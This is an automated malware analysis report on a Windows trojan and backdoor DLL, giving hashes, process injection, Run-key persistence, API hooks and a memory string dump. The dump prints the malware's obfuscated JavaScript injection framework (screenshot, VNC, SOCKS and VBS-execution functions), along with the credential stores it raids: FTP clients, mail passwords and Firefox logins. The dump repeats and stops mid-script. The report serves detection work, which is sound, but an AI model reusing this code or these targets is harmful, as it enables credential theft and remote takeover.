Gen.Variant.Kazy.490701_c6ba1e2b9a

by malwarelabrobot on December 17th, 2014 in Malware Descriptions.

Trojan.Win32.Inject.thsa (Kaspersky), Gen:Variant.Kazy.490701 (B) (Emsisoft), Gen:Variant.Kazy.490701 (AdAware), GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: c6ba1e2b9a61cae769ea4681492a0eff
SHA1: 01d04ff57a1bb892f1ef545ca233c83511c3ffbe
SHA256: 126d8c3748258bffa546740d2a45fc5f5c3c6be2946dfe8eb51db8185848b414
SSDeep: 12288:4suptIELBsBrwLNM6gWKRlQlKFQqjYZB19wL:4/pttLBXL23RlBjtL
Size: 471040 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC80Debug, UPolyXv05_v6
Company: Install Manager
Created at: 2003-01-13 03:20:55
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

regsvr32.exe:632

The Trojan injects its code into the following process(es):

imapi.exe:1780
vmacthlp.exe:928
wmiprvse.exe:492
Explorer.EXE:880
spoolsv.exe:1444
jqs.exe:1976

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process regsvr32.exe:632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\UeqofFisow\DawoKamq.dat (273 bytes)

Registry activity

The process regsvr32.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 11 0C 1B B0 9B 93 99 FB B5 F0 C4 9B 31 9F 5B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{7BD47FDD-1028-4944-A268-024C76A61BA9}]
"#sd" = "63 3A 5C 63 36 62 61 31 65 32 62 39 61 36 31 63"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DawoKamq" = "regsvr32.exe %Documents and Settings%\All Users\Application Data\DawoKamq\DawoKamq.dat"

The process vmacthlp.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Classes\CLSID\{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}]
"{4E153850-602D-4819-B83D-3CCD0A1E7351}" = "15 B3 99 DC"

Dropped PE files

MD5 File path
e5a1b034bc3a89a6bdd0f329b2bae76c c:\Documents and Settings\All Users\Application Data\DawoKamq\DawoKamq.dat

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateProcessA
CreateProcessW

Propagation

VersionInfo

Company Name: America Online
Product Name:
Product Version:
Legal Copyright: Copyright (c) 1997 America Online, Inc.
Legal Trademarks:
Original Filename: jgsd400.dll
Internal Name: jgsd400.dll
File Version: 017
File Description: JG ART DLL
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 404713 405504 4.65956 4af7de805d85f0ab3fbee88f8eb7bba3
.idata 409600 6064 8192 2.57602 3a0d7accd7bb1470d43ae2228ab12e4a
/4 417792 898 4096 0.21976 1c0e6855dedd16eccfc0e3d500e2d98f
.rdata 421888 22134 24576 1.60392 944d1c1f9e98cffa0d8e568b750bf573
.data 446464 19184 16384 3.82449 8e0d86db8b816ab9c2ee5ff52d307629
.rsrc 466944 716 4096 0.542196 c744e3b372e1158fb59c331578b9e134
.reloc 471040 1897 4096 0.892675 f92c7bfce9bf70e986a488dfd444dcd3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the folowing location(s):

wmiprvse.exe_492_rwx_00DD0000_00054000:

%Documents and Settings%\All Users\Application Data\DawoKamq\DawoKamq.dat
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
chrome.dll
127.0.0.1
DrWeb
McAfee.com
Doctor Web
Common Files\Doctor Web
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
Shell Update Exists %s = %s
Shell Reload status = %u = %u
#cert
Del Old = %s
Del Reg = %s
Fail Save New = %u
Reg Autorun = %u = %u = %ws = %ws
Updated fail size %u != %u
Updated RSA Init fail = %u
Sign Bad = %u
Save New File = %u = %u
Update_InstallNew = %u = %u
[Pony] Fail Get Pass
Start Update: %s = %u
download status = %u =%u
Updated status = %u
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHDeleteKeyA
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
ole32.dll
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
=)=2===~=
3 343=3_3
= =,=`=}=
.pdata
@.reloc
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
echrome.dll
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort

wmiprvse.exe_492_rwx_01040000_0007C000:

.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3.0")}z(e){}B{j A F("M.E")}z(e){}B{j A F("1q.E")}z(e){}j s}}j A H()};i.m=k(a,b,c,d){N f=i.O();N g=p;N h=i;G=(w(d)==\'I\')?s:q;b=\'/\' i.P \'/\' W.19() \'/\' b;o(G==q){i.x=p;f.1a=k(){B{o(f.T==4){o(f.R!=Q||f.y==\'-\'){h.x=s;o(w(d)=="k"){d(s)}}C{o(f.y==\' \'){h.x=q;o(w(d)=="k"){d(q)}}C{h.x=f.y;o(w(d)=="k"){d(f.y)}}}}}z(e){h.x=s;o(w(d)=="k"){d(s)}}}}f.1b(a,b,G);f.1e(c);o(G==q){j q}B{o(f.T==4&&f.R==Q){o(f.y==\'-\'){j s}C{o(f.y==\' \'){j q}C{j f.y}}}j s}z(e){j s}};i.1g=k(){j i.x};i.1p=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.17=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.18=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' 